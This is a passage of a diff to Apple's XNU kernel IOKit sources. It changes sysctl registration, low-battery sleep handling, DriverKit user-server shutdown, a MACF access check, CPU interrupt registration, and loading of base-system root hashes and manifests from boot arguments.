+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_targettype, "A", "targettype");
 
 static SYSCTL_INT(_debug, OID_AUTO, noidle, CTLFLAG_RW, &gNoIdleFlag, 0, "");
@@ -1373,7 +1401,7 @@ sysctl_aotmetrics SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmetrics,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_aotmetrics, "S,IOPMAOTMetrics", "");
 
 
@@ -1422,7 +1450,7 @@ sysctl_aotmodebits
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmodebits,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_aotmodebits, "I", "");
 
 static int
@@ -1447,7 +1475,7 @@ sysctl_aotmode
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmode,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_aotmode, "I", "");
 
 //******************************************************************************
@@ -1748,24 +1776,7 @@ IOPMrootDomain::start( IOService * nub )
 
        // read swd_panic boot-arg
        PE_parse_boot_argn("swd_panic", &gSwdPanic, sizeof(gSwdPanic));
-       sysctl_register_oid(&sysctl__kern_sleeptime);
-       sysctl_register_oid(&sysctl__kern_waketime);
-       sysctl_register_oid(&sysctl__kern_willshutdown);
-       sysctl_register_oid(&sysctl__kern_iokittest);
-       sysctl_register_oid(&sysctl__debug_iokit);
-       sysctl_register_oid(&sysctl__hw_targettype);
-
-#if defined(XNU_TARGET_OS_OSX)
-       sysctl_register_oid(&sysctl__kern_progressmeterenable);
-       sysctl_register_oid(&sysctl__kern_progressmeter);
-       sysctl_register_oid(&sysctl__kern_wakereason);
-#endif /* defined(XNU_TARGET_OS_OSX) */
-       sysctl_register_oid(&sysctl__kern_consoleoptions);
-       sysctl_register_oid(&sysctl__kern_progressoptions);
-
-       sysctl_register_oid(&sysctl__kern_aotmode);
-       sysctl_register_oid(&sysctl__kern_aotmodebits);
-       sysctl_register_oid(&sysctl__kern_aotmetrics);
+       gWillShutdownSysctlRegistered = true;
 
 #if HIBERNATION
 #if defined(__arm64__)
@@ -2971,6 +2982,9 @@ IOPMrootDomain::powerChangeDone( unsigned long previousPowerState )
                        // Until the platform driver can claim its wake reasons
                        strlcat(gWakeReasonString, wakeReason->getCStringNoCopy(),
                            sizeof(gWakeReasonString));
+                       if (!gWakeReasonSysctlRegistered) {
+                               gWakeReasonSysctlRegistered = true;
+                       }
                        WAKEEVENT_UNLOCK();
                }
 
@@ -6002,6 +6016,27 @@ IOPMrootDomain::overrideOurPowerChange(
            _currentCapability, changeFlags,
            request->getTag());
 
+
+#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
+       /*
+        * ASBM send lowBattery notifications every 1 second until the device
+        * enters hibernation. This queues up multiple sleep requests.
+        * After the device wakes from hibernation, none of these previously
+        * queued sleep requests are valid.
+        * lowBattteryCondition variable is set when ASBM notifies rootDomain
+        * and is cleared at the very last point in sleep.
+        * Any attempt to sleep with reason kIOPMSleepReasonLowPower without
+        * lowBatteryCondition is invalid
+        */
+       if (REQUEST_TAG_TO_REASON(request->getTag()) == kIOPMSleepReasonLowPower) {
+               if (!lowBatteryCondition) {
+                       DLOG("Duplicate lowBattery sleep");
+                       *inOutChangeFlags |= kIOPMNotDone;
+                       return;
+               }
+       }
+#endif
+
        if ((AOT_STATE == desiredPowerState) && (ON_STATE == currentPowerState)) {
                // Assertion may have been taken in AOT leading to changePowerStateTo(AOT)
                *inOutChangeFlags |= kIOPMNotDone;
@@ -6015,15 +6050,6 @@ IOPMrootDomain::overrideOurPowerChange(
                return;
        }
 
-#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
-       if (lowBatteryCondition && (desiredPowerState < currentPowerState)) {
-               // Reject sleep requests when lowBatteryCondition is TRUE to
-               // avoid racing with the impending system shutdown.
-               *inOutChangeFlags |= kIOPMNotDone;
-               return;
-       }
-#endif
-
        if (desiredPowerState < currentPowerState) {
                if (CAP_CURRENT(kIOPMSystemCapabilityGraphics)) {
                        // Root domain is dropping power state from ON->SLEEP.
@@ -8156,23 +8182,9 @@ IOPMrootDomain::handlePowerNotification( UInt32 msg )
         * Power Emergency
         */
        if (msg & kIOPMPowerEmergency) {
-               DLOG("Low battery notification received\n");
-#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
-               // Wait for the next low battery notification if the system state is
-               // in transition.
-               if ((_systemTransitionType == kSystemTransitionNone) &&
-                   CAP_CURRENT(kIOPMSystemCapabilityCPU) &&
-                   !systemBooting && !systemShutdown && !gWillShutdown) {
-                       // Setting lowBatteryCondition will prevent system sleep
-                       lowBatteryCondition = true;
-
-                       // Notify userspace to initiate system shutdown
-                       messageClients(kIOPMMessageRequestSystemShutdown);
-               }
-#else
+               DLOG("Received kIOPMPowerEmergency");
                lowBatteryCondition = true;
                privateSleepSystem(kIOPMSleepReasonLowPower);
-#endif
        }
 
        /*
@@ -10692,9 +10704,6 @@ IOPMrootDomain::claimSystemWakeEvent(
                // Lazy registration until the platform driver stops registering
                // the same name.
                gWakeReasonSysctlRegistered = true;
-#if !defined(XNU_TARGET_OS_OSX)
-               sysctl_register_oid(&sysctl__kern_wakereason);
-#endif /* !defined(XNU_TARGET_OS_OSX) */
        }
        if (addWakeReason) {
                _systemWakeEventsArray->setObject(dict.get());
@@ -10737,8 +10746,7 @@ IOPMrootDomain::claimSystemBootEvent(
        if (!gBootReasonSysctlRegistered) {
                // Lazy sysctl registration after setting gBootReasonString
                strlcat(gBootReasonString, reason, sizeof(gBootReasonString));
-               sysctl_register_oid(&sysctl__kern_bootreason);
-               gBootReasonSysctlRegistered = true;
+               os_atomic_store(&gBootReasonSysctlRegistered, true, release);
        }
        WAKEEVENT_UNLOCK();
 }
@@ -10767,10 +10775,7 @@ IOPMrootDomain::claimSystemShutdownEvent(
        }
        strlcat(gShutdownReasonString, reason, sizeof(gShutdownReasonString));
 
-       if (!gShutdownReasonSysctlRegistered) {
-               sysctl_register_oid(&sysctl__kern_shutdownreason);
-               gShutdownReasonSysctlRegistered = true;
-       }
+       gShutdownReasonSysctlRegistered = true;
        WAKEEVENT_UNLOCK();
 }
 
index 407dd5b02e3e46e4ca8b0ea3d9972f9fd716f276..3fdec62e4b083cf607d00a7e8509acba6714d076 100644 (file)
@@ -1082,6 +1082,8 @@ PEHaltRestartInternal(unsigned int type, uint32_t details)
                                IOCPURunPlatformPanicActions(type, details);
                        }
                }
+       } else if (type == kPEPanicDiagnosticsDone) {
+               IOCPURunPlatformPanicActions(type, details);
        }
 
 skip_to_haltRestart:
index c99de88582ddfef3fcacd473db7108f78a539cd4..04b3faf949bbe293ae23c61c78f7f07178c2d44d 100644 (file)
@@ -370,6 +370,7 @@ IOService           * fSystemPowerAckTo;
 uint32_t              fSystemPowerAckRef;
 uint8_t               fSystemOff;
 uint8_t               fUserServerOff;
+uint8_t               fWaitingUserServers;
 
 void lock();
 void unlock();
@@ -4150,6 +4151,12 @@ IOServicePH::serverRemove(IOUserServer * server)
        if (idx != -1U) {
                fUserServers->removeObject(idx);
        }
+
+       if (fWaitingUserServers) {
+               fWaitingUserServers = false;
+               IOLockWakeup(gJobsLock, &fWaitingUserServers, /* one-thread */ false);
+       }
+
        unlock();
 }
 
@@ -4275,6 +4282,41 @@ IOServicePH::matchingEnd(IOService * service)
        serverAck(NULL);
 }
 
+
+void
+IOServicePH::systemHalt(void)
+{
+       OSArray * notifyServers;
+       uint64_t  deadline;
+
+       lock();
+       notifyServers = OSArray::withArray(fUserServers);
+       unlock();
+
+       if (notifyServers) {
+               notifyServers->iterateObjects(^bool (OSObject * obj) {
+                       IOUserServer * us;
+                       us = (typeof(us))obj;
+                       us->systemHalt();
+                       return false;
+               });
+               OSSafeReleaseNULL(notifyServers);
+       }
+
+       lock();
+       clock_interval_to_deadline(1000, kMillisecondScale, &deadline);
+       while (0 < fUserServers->getCount()) {
+               fWaitingUserServers = true;
+               __assert_only int waitResult =
+                   IOLockSleepDeadline(gJobsLock, &fWaitingUserServers, deadline, THREAD_UNINT);
+               assert((THREAD_AWAKENED == waitResult) || (THREAD_TIMED_OUT == waitResult));
+               if (THREAD_TIMED_OUT == waitResult) {
+                       break;
+               }
+       }
+       unlock();
+}
+
 bool
 IOServicePH::serverSlept(void)
 {
index c022807f2129a647e46335704fa90bfc60e52975..cb13e69e26d02eec747d95f6fc72c0ea9bdd425e 100644 (file)
@@ -173,7 +173,6 @@ InitIOKit(void *dtTop)
        IOLibInit();
        OSlibkernInit();
        IOMachPortInitialize();
-       devsw_init();
 
        gIOProgressBackbufferKey  = OSSymbol::withCStringNoCopy(kIOProgressBackbufferKey);
        gIORemoveOnReadProperties = OSSet::withObjects((const OSObject **) &gIOProgressBackbufferKey, 1);
index 20d9cc3efc72b7ff6086c49e18c8f83db8bb3d57..d0e87bf2447a945d7011dc34b9d91caa2a0577f2 100644 (file)
@@ -151,6 +151,10 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru
        int error = EINVAL;
        uint32_t request = arg2;
 
+       if (!IOStatistics::isEnabled()) {
+               return ENOENT;
+       }
+
        switch (request) {
        case kIOStatisticsGeneral:
                error = IOStatistics::getStatistics(req);
@@ -171,17 +175,18 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru
 SYSCTL_NODE(_debug, OID_AUTO, iokit_statistics, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "IOStatistics");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, general,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsGeneral, oid_sysctl, "S", "");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, workloop,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsWorkLoop, oid_sysctl, "S", "");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, userclient,
-    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsUserClient, oid_sysctl, "S", "");
 
+
 void
 IOStatistics::initialize()
 {
@@ -194,10 +199,6 @@ IOStatistics::initialize()
                return;
        }
 
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_general);
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_workloop);
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_userclient);
-
        lock = IORWLockAlloc();
        if (!lock) {
                return;
index 12bc47e4656212a1c29f03477d1587c145d3ceb1..6d1edda91f769008692375811c3bc3b100da0243 100644 (file)
@@ -4213,6 +4213,11 @@ is_io_service_open_extended(
                return kIOReturnBadArgument;
        }
 
+#if CONFIG_MACF
+       if (mac_iokit_check_open_service(kauth_cred_get(), service, connect_type) != 0) {
+               return kIOReturnNotPermitted;
+       }
+#endif
        do{
                if (properties) {
                        return kIOReturnUnsupported;
index 88fd179e5dad23ba1361d26860d25edd8c10d13a..ffd44f0c714ebfeaed2f4f59382d5f86e5da3eed 100644 (file)
@@ -2867,7 +2867,7 @@ IOUserServer::rpc(IORPC rpc)
                    0, &message_moved);
        } else {
                assert(replySize >= (sizeof(IORPCMessageMach) + sizeof(IORPCMessage)));
-               ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, &message_moved);
+               ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, FALSE, &message_moved);
        }
 
        ipc_port_release_send(sendPort);
@@ -3365,6 +3365,44 @@ IOUserClient * IOUserServer::withTask(task_t owningTask)
 IOReturn
 IOUserServer::clientClose(void)
 {
+       OSArray   * services;
+
+       if (kIODKLogSetup & gIODKDebug) {
+               DKLOG("%s::clientClose(%p)\n", getName(), this);
+       }
+
+       services = NULL;
+       IOLockLock(fLock);
+       if (fServices) {
+               services = OSArray::withArray(fServices);
+       }
+       IOLockUnlock(fLock);
+
+       // if this was a an expected exit, termination and stop should have detached at this
+       // point, so send any provider still attached and not owned by this user server
+       // the ClientCrashed() notification
+       if (services) {
+               services->iterateObjects(^bool (OSObject * obj) {
+                       IOService * service;
+                       IOService * provider;
+
+                       service = (IOService *) obj;
+                       if (service->isInactive()) {
+                               return false;
+                       }
+                       provider = service->getProvider();
+                       if (provider
+                       && (!provider->reserved->uvars || (provider->reserved->uvars->userServer != this))) {
+                               if (kIODKLogSetup & gIODKDebug) {
+                                       DKLOG(DKS "::ClientCrashed(" DKS ")\n", DKN(provider), DKN(service));
+                               }
+                               provider->ClientCrashed(service, 0);
+                       }
+                       return false;
+               });
+               services->release();
+       }
+
        terminate();
        return kIOReturnSuccess;
 }
@@ -3700,11 +3738,10 @@ IOUserServer::serviceNewUserClient(IOService * service, task_t owningTask, void
 
        if (!(kIODKDisableEntitlementChecking & gIODKDebug)) {
                bundleID = NULL;
-               entitlements = NULL;
+               entitlements = IOUserClient::copyClientEntitlements(owningTask);
                if (fEntitlements && fEntitlements->getObject(gIODriverKitUserClientEntitlementAllowAnyKey)) {
                        ok = true;
                } else {
-                       entitlements = IOUserClient::copyClientEntitlements(owningTask);
                        bundleID = service->copyProperty(gIOModuleIdentifierKey);
                        ok = (entitlements
                            && bundleID
@@ -4115,6 +4152,48 @@ IOUserServer::systemPower(bool powerOff)
 }
 
 
+void
+IOUserServer::systemHalt(void)
+{
+       OSArray * services;
+
+       if (true || (kIODKLogPM & gIODKDebug)) {
+               DKLOG("%s::systemHalt()\n", getName());
+       }
+
+       IOLockLock(fLock);
+       services = OSArray::withArray(fServices);
+       IOLockUnlock(fLock);
+
+       if (services) {
+               services->iterateObjects(^bool (OSObject * obj) {
+                       IOService  * service;
+                       IOService  * provider;
+                       IOOptionBits terminateOptions;
+                       bool         root;
+
+                       service = (IOService *) obj;
+                       provider = service->getProvider();
+                       if (!provider) {
+                               DKLOG("stale service " DKS " found, skipping termination\n", DKN(service));
+                               return false;
+                       }
+                       root = (NULL == provider->getProperty(gIOUserServerNameKey, gIOServicePlane));
+                       if (true || (kIODKLogPM & gIODKDebug)) {
+                               DKLOG("%d: terminate(" DKS ")\n", root, DKN(service));
+                       }
+                       if (!root) {
+                               return false;
+                       }
+                       terminateOptions = kIOServiceRequired | kIOServiceTerminateNeedWillTerminate;
+                       if (!service->terminate(terminateOptions)) {
+                               IOLog("failed to terminate service %s-0x%llx\n", service->getName(), service->getRegistryEntryID());
+                       }
+                       return false;
+               });
+       }
+       OSSafeReleaseNULL(services);
+}
 
 IOReturn
 IOUserServer::serviceStarted(IOService * service, IOService * provider, bool result)
@@ -4150,9 +4229,21 @@ IOUserServer::serviceStarted(IOService * service, IOService * provider, bool res
                pmProvider = pmProvider->getProvider();
        }
        if (pmProvider) {
+               IOService * entry;
                OSObject  * prop;
+               OSObject  * nextProp;
                OSString  * str;
-               prop = pmProvider->copyProperty("non-removable");
+
+               entry = pmProvider;
+               prop  = NULL;
+               do {
+                       nextProp = entry->copyProperty("non-removable");
+                       if (nextProp) {
+                               OSSafeReleaseNULL(prop);
+                               prop = nextProp;
+                       }
+                       entry = entry->getProvider();
+               } while (entry);
                if (prop) {
                        str = OSDynamicCast(OSString, prop);
                        if (str && str->isEqualTo("yes")) {
@@ -4287,7 +4378,7 @@ IOUserServer::serviceWillTerminate(IOService * client, IOService * provider, IOO
        }
 
        if (willTerminate) {
-               if (IOServicePH::serverSlept()) {
+               if ((true) || IOServicePH::serverSlept()) {
                        client->Stop_async(provider);
                        ret = kIOReturnOffline;
                } else {
@@ -4354,6 +4445,14 @@ IOUserServer::serviceDidStop(IOService * client, IOService * provider)
        }
 }
 
+kern_return_t
+IOService::ClientCrashed_Impl(
+       IOService * client,
+       uint64_t    options)
+{
+       return kIOReturnUnsupported;
+}
+
 kern_return_t
 IOService::Stop_Impl(
        IOService * provider)
@@ -4493,11 +4592,12 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments *
        }
 
        if (MACH_PORT_NULL != args->asyncWakePort) {
+               // this retain is for the OSAction to release
+               iokit_make_port_send(args->asyncWakePort);
                kr = CreateActionKernelCompletion(sizeof(IOUserUserClientActionRef), &action);
                assert(KERN_SUCCESS == kr);
                ref = (typeof(ref))action->GetReference();
                bcopy(args->asyncReference, &ref->asyncRef[0], args->asyncReferenceCount * sizeof(ref->asyncRef[0]));
-
                kr = action->SetAbortedHandler(^(void) {
                        IOUserUserClientActionRef * ref;
                        IOReturn ret;
@@ -4528,12 +4628,14 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments *
        OSSafeReleaseNULL(action);
 
        if (kIOReturnSuccess != kr) {
-               if (ref) {
-                       // mig will destroy any async port, remove our pointer to it
-                       bzero(&ref->asyncRef[0], sizeof(ref->asyncRef));
-               }
+               // mig will destroy any async port
                return kr;
        }
+       if (MACH_PORT_NULL != args->asyncWakePort) {
+               // this release is for the mig created send right
+               iokit_release_port_send(args->asyncWakePort);
+       }
+
        if (structureOutput) {
                if (args->structureVariableOutputData) {
                        *args->structureVariableOutputData = structureOutput;
index 9415e022667966cf6f092c46eb38378cb49268ba..9121b6bf65e347fe02904f2f295a69d64d07ce66 100644 (file)
@@ -37,6 +37,7 @@ extern "C" {
 
 #include <libkern/OSAtomic.h>
 #include <libkern/c++/OSCollection.h>
+#include <IOKit/IODeviceTreeSupport.h>
 #include <IOKit/IOLib.h>
 #include <IOKit/IOPlatformActions.h>
 #include <IOKit/IOPMGR.h>
@@ -81,35 +82,53 @@ idle_timer_wrapper(void */*refCon*/, uint64_t *new_timeout_ticks)
        gPMGR->updateCPUIdle(new_timeout_ticks);
 }
 
+static OSDictionary *
+matching_dict_for_cpu_id(unsigned int cpu_id)
+{
+       // The cpu-id property in EDT doesn't necessarily match the dynamically
+       // assigned logical ID in XNU, so look up the cpu node by the physical
+       // (cluster/core) ID instead.
+       OSSymbolConstPtr cpuTypeSymbol = OSSymbol::withCString("cpu");
+       OSSymbolConstPtr cpuIdSymbol = OSSymbol::withCString("reg");
+       OSDataPtr cpuId = OSData::withBytes(&(topology_info->cpus[cpu_id].phys_id), sizeof(uint32_t));
+
+       OSDictionary *propMatch = OSDictionary::withCapacity(4);
+       propMatch->setObject(gIODTTypeKey, cpuTypeSymbol);
+       propMatch->setObject(cpuIdSymbol, cpuId);
+
+       OSDictionary *matching = IOService::serviceMatching("IOPlatformDevice");
+       matching->setObject(gIOPropertyMatchKey, propMatch);
+
+       propMatch->release();
+       cpuTypeSymbol->release();
+       cpuIdSymbol->release();
+       cpuId->release();
+
+       return matching;
+}
+
 static void
 register_aic_handlers(const ml_topology_cpu *cpu_info,
     ipi_handler_t ipi_handler,
     perfmon_interrupt_handler_func pmi_handler)
 {
-       const int n_irqs = 3;
-       int i;
-       IOInterruptVectorNumber irqlist[n_irqs] = {
-               cpu_info->self_ipi_irq,
-               cpu_info->other_ipi_irq,
-               cpu_info->pmi_irq };
-
-       IOService *fakeCPU = new IOService();
-       if (!fakeCPU || !fakeCPU->init()) {
-               panic("Can't initialize fakeCPU");
-       }
+       OSDictionary *matching = matching_dict_for_cpu_id(cpu_info->cpu_id);
+       IOService *cpu = IOService::waitForMatchingService(matching, UINT64_MAX);
+       matching->release();
 
-       IOInterruptSource source[n_irqs];
-       for (i = 0; i < n_irqs; i++) {
-               source[i].vectorData = OSData::withBytes(&irqlist[i], sizeof(irqlist[0]));
+       OSArray *irqs = (OSArray *) cpu->getProperty(gIOInterruptSpecifiersKey);
+       if (!irqs) {
+               panic("Error finding interrupts for CPU %d", cpu_info->cpu_id);
        }
-       fakeCPU->_interruptSources = source;
 
-       if (cpu_info->self_ipi_irq && cpu_info->other_ipi_irq) {
+       unsigned int irqcount = irqs->getCount();
+
+       if (irqcount == 3) {
                // Legacy configuration, for !HAS_IPI chips (pre-Skye).
-               if (gAIC->registerInterrupt(fakeCPU, 0, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 0) != kIOReturnSuccess ||
-                   gAIC->registerInterrupt(fakeCPU, 1, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 1) != kIOReturnSuccess) {
+               if (cpu->registerInterrupt(0, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(0) != kIOReturnSuccess ||
+                   cpu->registerInterrupt(2, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(2) != kIOReturnSuccess) {
                        panic("Error registering IPIs");
                }
 #if !defined(HAS_IPI)
@@ -118,17 +137,14 @@ register_aic_handlers(const ml_topology_cpu *cpu_info,
                aic_ipis = true;
 #endif
        }
+
        // Conditional, because on Skye and later, we use an FIQ instead of an external IRQ.
-       if (pmi_handler && cpu_info->pmi_irq) {
-               if (gAIC->registerInterrupt(fakeCPU, 2, NULL, (IOInterruptHandler)pmi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 2) != kIOReturnSuccess) {
+       if (pmi_handler && irqcount == 1) {
+               if (cpu->registerInterrupt(1, NULL, (IOInterruptAction)pmi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(1) != kIOReturnSuccess) {
                        panic("Error registering PMI");
                }
        }
-
-       for (i = 0; i < n_irqs; i++) {
-               source[i].vectorData->release();
-       }
 }
 
 static void
@@ -158,7 +174,6 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/)
        }
        memset(machProcessors, 0, array_size);
 
-       ml_cpu_init_state();
        for (unsigned int cpu = 0; cpu < topology_info->num_cpus; cpu++) {
                const ml_topology_cpu *cpu_info = &topology_info->cpus[cpu];
                const unsigned int cpu_id = cpu_info->cpu_id;
@@ -192,6 +207,7 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/)
                        panic("processor_start failed");
                }
        }
+       ml_cpu_init_completed();
        IOService::publishResource(gIOAllCPUInitializedKey, kOSBooleanTrue);
 }
 
@@ -221,7 +237,8 @@ PE_cpu_start(cpu_id_t target,
        unsigned int cpu_id = target_to_cpu_id(target);
 
        if (cpu_id != boot_cpu) {
-               gPMGR->enableCPUCore(cpu_id);
+               extern unsigned int LowResetVectorBase;
+               gPMGR->enableCPUCore(cpu_id, ml_vtophys((vm_offset_t)&LowResetVectorBase));
        }
        return KERN_SUCCESS;
 }
index ca0e3b8952fe30bab3f99b0492d9cbc6b67e3bef..8c71598d7517fffee543d71c689154f81be2890d 100644 (file)
@@ -54,24 +54,19 @@ static IOMemoryDescriptor* apfsKeyData = NULL;
 IOMemoryDescriptor* IOGetAPFSKeyStoreData();
 void IOSetAPFSKeyStoreData(IOMemoryDescriptor* data);
 
-static volatile UInt32 arvRootHashFetched = 0;
+static volatile UInt32 ARVRootHashFetched = 0;
 static volatile UInt32 bsARVRootHashFetched = 0;
-static IOMemoryDescriptor* arvRootHashData = NULL;
-static IOMemoryDescriptor* bsARVRootHashData = NULL;
 
 IOMemoryDescriptor* IOGetARVRootHashData(void);
-void IOSetARVRootHashData(IOMemoryDescriptor* arvData);
-
 IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void);
-bool IOBaseSystemARVRootHashAvailable(void);
-void IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData);
 
+bool IOBaseSystemARVRootHashAvailable(void);
 
-static volatile UInt32 arvManifestFetched = 0;
-static IOMemoryDescriptor* arvManifestData = NULL;
+static volatile UInt32 ARVManifestFetched = 0;
+static volatile UInt32 bsARVManifestFetched = 0;
 
 IOMemoryDescriptor* IOGetARVManifestData(void);
-void IOSetARVManifestData(IOMemoryDescriptor* arvData);
+IOMemoryDescriptor* IOGetBaseSystemARVManifestData(void);
 
 __END_DECLS
 
@@ -181,34 +176,15 @@ IOGetAPFSKeyStoreData()
 
 // ARV Root Hash fetcher
 
-// Store in-memory Root Hash
-void
-IOSetARVRootHashData(IOMemoryDescriptor* arvData)
-{
-       // Do not allow re-fetching of the boot_args root hash by passing NULL here.
-       if (arvData) {
-               arvRootHashData = arvData;
-               arvRootHashFetched = 0;
-       }
-}
-
-// Retrieve any root hash we may have (stored in boot_args or in-memory)
+// Retrieve any root hash we may have (stored in boot_args)
 IOMemoryDescriptor*
 IOGetARVRootHashData(void)
 {
        // Check if someone got the root hash before us
-       if (!OSCompareAndSwap(0, 1, &arvRootHashFetched)) {
+       if (!OSCompareAndSwap(0, 1, &ARVRootHashFetched)) {
                return NULL;
        }
 
-       // Do we have in-memory root hash?
-       if (arvRootHashData) {
-               IOMemoryDescriptor* arvData = arvRootHashData;
-               arvRootHashData = NULL;
-               return arvData;
-       }
-
-       // Looks like there was no in-memory root hash and it's the first call - try boot_args
        boot_args* args = (boot_args*)PE_state.bootArgs;
 
        DEBG("%s: data at address %llu size %llu\n", __func__, args->arvRootHashStart, args->arvRootHashSize);
@@ -228,68 +204,62 @@ IOGetARVRootHashData(void)
        return memoryDescriptor;
 }
 
-// Base System Analogues
+// Base System Analogue
 
 IOMemoryDescriptor*
 IOGetBaseSystemARVRootHashData(void)
 {
-       //TBD!
-       return NULL;
+       // Check if someone got the base system root hash before us
+       if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) {
+               return NULL;
+       }
+
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVRootHashStart, args->bsARVRootHashSize);
+       if (args->bsARVRootHashStart == 0) {
+               return NULL;
+       }
+
+       // We have the base system root hash in the boot_args, create IOMemoryDescriptor for the blob
+       IOAddressRange ranges;
+       ranges.address = args->bsARVRootHashStart;
+       ranges.length = args->bsARVRootHashSize;
+
+       const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone;
+
+       IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options);
+       DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
+       return memoryDescriptor;
 }
 
 bool
 IOBaseSystemARVRootHashAvailable(void)
 {
-       // Check if someone got the root hash before us
-       if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) {
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       if (args->bsARVRootHashStart == 0 || args->bsARVRootHashSize == 0) {
                return false;
        }
 
-       // Do we have in-memory root hash?
-       if (bsARVRootHashData) {
-               return true;
+       if (args->bsARVManifestStart == 0 || args->bsARVManifestSize == 0) {
+               return false;
        }
-       return false;
-}
 
-
-void
-IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData)
-{
-       return;
+       return true;
 }
 
-
 // ARV Manifest fetcher
 
-// Store in-memory Manifest
-void
-IOSetARVManifestData(IOMemoryDescriptor* arvData)
-{
-       // Do not allow re-fetching of the boot_args manifest by passing NULL here.
-       if (arvData) {
-               arvManifestData = arvData;
-               arvManifestFetched = 0;
-       }
-}
-
-// Retrieve any manifest we may have (stored in boot_args or in-memory)
+// Retrieve any manifest we may have (stored in boot_args)
 IOMemoryDescriptor*
 IOGetARVManifestData(void)
 {
        // Check if someone got the manifest before us
-       if (!OSCompareAndSwap(0, 1, &arvManifestFetched)) {
+       if (!OSCompareAndSwap(0, 1, &ARVManifestFetched)) {
                return NULL;
        }
 
-       // Do we have in-memory manifest?
-       if (arvManifestData) {
-               IOMemoryDescriptor* arvData = arvManifestData;
-               arvManifestData = NULL;
-               return arvData;
-       }
-
-       // Looks like there was no in-memory manifest and it's the first call - try boot_args
        boot_args* args = (boot_args*)PE_state.bootArgs;
 
        DEBG("%s: data at address %llu size %llu\n", __func__, args->arvManifestStart, args->arvManifestSize);
@@ -308,3 +278,32 @@ IOGetARVManifestData(void)
        DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
        return memoryDescriptor;
 }
+
+// Base System Analogue
+
+IOMemoryDescriptor*
+IOGetBaseSystemARVManifestData(void)
+{
+       // Check if someone got the base system manifest before us
+       if (!OSCompareAndSwap(0, 1, &bsARVManifestFetched)) {
+               return NULL;
+       }
+
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVManifestStart, args->bsARVManifestSize);
+       if (args->bsARVManifestStart == 0) {
+               return NULL;
+       }
+
